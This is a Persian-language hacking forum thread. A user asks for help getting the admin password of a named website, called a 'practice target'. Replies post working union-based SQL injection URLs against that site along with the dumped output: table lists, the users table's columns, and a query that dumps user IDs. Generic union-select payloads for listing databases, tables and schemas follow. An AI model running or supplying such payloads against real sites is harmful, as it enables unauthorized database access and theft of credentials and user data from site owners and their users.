تارگت تمرینی

[Root95]

سلام خدمت همه دوستان

 

من یه تارگت تمرینی از بخش تارگت های تمرین برداشتم که تست کنم میتونم رمز ادمین رو بزنم ولی هر کاری میکنم انگار نمیشه یا من درست نمیرم دارم به ترتیب فیلم عمل میکنم ولی انگار یه جایی لقی میزنم نمیدونم کجا ..

تعدا ستون هارو پیدا کردم

ستونی که آسیب پذیره رو پیدا کردم

ورژن رو پیدا میکنم

با دستور groub_concat تیبل های دیتابیس information_schema رو بیرون می کشیم ولی از اینجا به بعدش برام خیلی مبهمه نمیدونم باید چطور پیش بره هر چه قدرم فیلم نگاه میکنم نمیدونم چجوره

اگه امکانش هست یکی از دوستان بیاد اینکارو بکنه وهر مراحلی رو که میره رو برام توی همین تاپیک توضیح بده با این تارگتی که خودم میدم اینکارو بکنه واقعا ممنون میشم

www.cardelicious.com/index.php?page=collection&collection=&cid=53

 

تشکر

[NET.HUN73R]

http://www.cardelicious.com/index.php?page=collection&collection=&cid=53+union+select+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables--

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,background,blog_commentmeta,blog_comments,blog_links,blog_options,blog_postmeta,blog_posts,blog_term_relationships,blog_term_taxonomy,blog_terms,blog_usermeta,blog_users,boxes,card_cards,card_collections,card_sub_collections,card_to_collection,card_topright,cards,collections,json_cache,slides,sub_collections,tweet_mentions,tweet_tags,tweet_urls,tweets,users

http://www.cardelicious.com/index.php?page=collection&collection=&cid=53+union+select+1,2,3,group_concat(column_name),5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273--

user_id,screen_name,name,profile_image_url,location,url,description,created_at,followers_count,friends_count,statuses_count,time_zone,last_update

http://www.cardelicious.com/index.php?page=collection&collection=&cid=53+union+select+1,2,3,group_concat(user_id),5,6,7,8+from+users--

[icelord]

سلام خدمت همه دوستان

 

من یه تارگت تمرینی از بخش تارگت های تمرین برداشتم که تست کنم میتونم رمز ادمین رو بزنم ولی هر کاری میکنم انگار نمیشه یا من درست نمیرم دارم به ترتیب فیلم عمل میکنم ولی انگار یه جایی لقی میزنم نمیدونم کجا ..

تعدا ستون هارو پیدا کردم

ستونی که آسیب پذیره رو پیدا کردم

ورژن رو پیدا میکنم

با دستور groub_concat تیبل های دیتابیس information_schema رو بیرون می کشیم ولی از اینجا به بعدش برام خیلی مبهمه نمیدونم باید چطور پیش بره هر چه قدرم فیلم نگاه میکنم نمیدونم چجوره

اگه امکانش هست یکی از دوستان بیاد اینکارو بکنه وهر مراحلی رو که میره رو برام توی همین تاپیک توضیح بده با این تارگتی که خودم میدم اینکارو بکنه واقعا ممنون میشم

www.cardelicious.com/index.php?page=collection&collection=&cid=53

 

تشکر

توضیحات در انجمن موجوده ولی یه بار د یگه براتون می گم.

سایتایی که از sql استفاده می کنن عموما دوتا دیتابیس دارن،یکی information_schema است که توی همه ی سایتا هست.دیتابیس بعدی اطلاعات سایت توشه.البته سایت می تونه بیشتر از دوتا هم داشته باشه.

شما اول میاید دیتابیس information_schema رو دنبال تیبل مهم می گردین اگر نبود باید برید دیتابیس های دیگه رو بگردین

[NET.HUN73R]

دوست عزیز میتونی بجای اینکعه بری دنبال دیتابیس باشی از دستور لایک استفاده کن

مثلا حدث بزن اسم تیبلی که یوزر پس توشه چیه مثل اینا

user/users/admin/login/member/members/wp_admin-/wp_user//.....

بعد از دستور بشه شکل زیر استفاده کن

site.com/+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_name+like+users--

که میتونی هگز هم کنی

[NET.HUN73R]

دوست عزیز بااین دستر میتونی تیبل های کل دیتابیس روفراخوانی کنی

site.com/+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

با دستور زیر میتونی اسم دیتابیس رو دربیاری

--site.com/+union+select+1,database(),3,4

با دستورزیر میتونی دیتابیس هارو فرا خوانی بکنی

site.com/+unio+select+1,group_concat(sechma_name),3,4+from+information_sechma.sechmata--

بازم سوالی مشکلی بود بپرسین در خدمتم

[Root95]

ببخشید من دیگه واقعا گیج شدم خیلی خیلی داغون :(

الان باید چجوری دیتابیس دیگه رو پیدا کنم ؟؟

اگه میشه رو اون تارگتی که دادم یه توضیح کوتاهی بدین واقعا ممنون میشم

[kingdeface]

دوست عزیز شما ابتدا خوب حملات sql injection رو یاد بگیرین واقعا دوستان توضیحشون عالی بود و.جای تحسین داره بالاخصNET.HUN73R عزیز و در دستوری هم که نوشته بودند کامله و می تونید دیتابیس رو تشخیص بدین خالا گاهی اوقات می بینید برنامه نویسش خیلی زرنگ تر از این حرفاست و تیبلهای دارای اطلاعات خوب رو به اسامی کد نویسی میکنه که براتون بی ارزش هست اما واقعا اطلاعاتی مهم در داخلش هست.

دوستان لطف کنند تنها سوالاتشون رو مطرح کنند نه اینکه تاپیک سوالات به دل نوشته تبدیل بشه و جواب سوال رو گرفتین دیگه ادامش ندید و اگر متوجه نشدین چندین بار خودتون سرچ کنید و برید دنبال یادگیری اگر میخواهید به جایی برسید.

موفق باشید

[Root95]

ببخشید بازم

من ستون user,admin,users اینارو پیدا میکنم دیگه نمیتونم برم داخلی اینا رو ببینم یعنی فقط یه مرحله میمونه فکرکنم همون قسمت هاش هست که من اونجا شو گیرم یعنی توی فیلم هرچه قدرنگاه میکنم متوجه نمیشم من ستون ADmin رو باید هاش کنم یا ن باید کار دیگه ایی صورت بگیره

 

 

-اگر تیبل مهمی درش نبود(مثل:admin - user -users -admins  و..) تیبل ها ی دیتابیس های دیگه رو پیدا می کنیم.تارگت ما تیبل مهمی نداشت.

6-کالومن ها رو پیدا می کنیم.توجه کنید که وقتش شما می خواید کالومن ها رو بیرون بکشید باید اسم تیبل به صورت هش باشه.

برای هش کردن به این آدرس برید.

 

این دوقسمت خیلی برام مبهمه نمیدونم یعنی چی؟

هرچه قدر فکر میکنم منظورشو نمیفهمم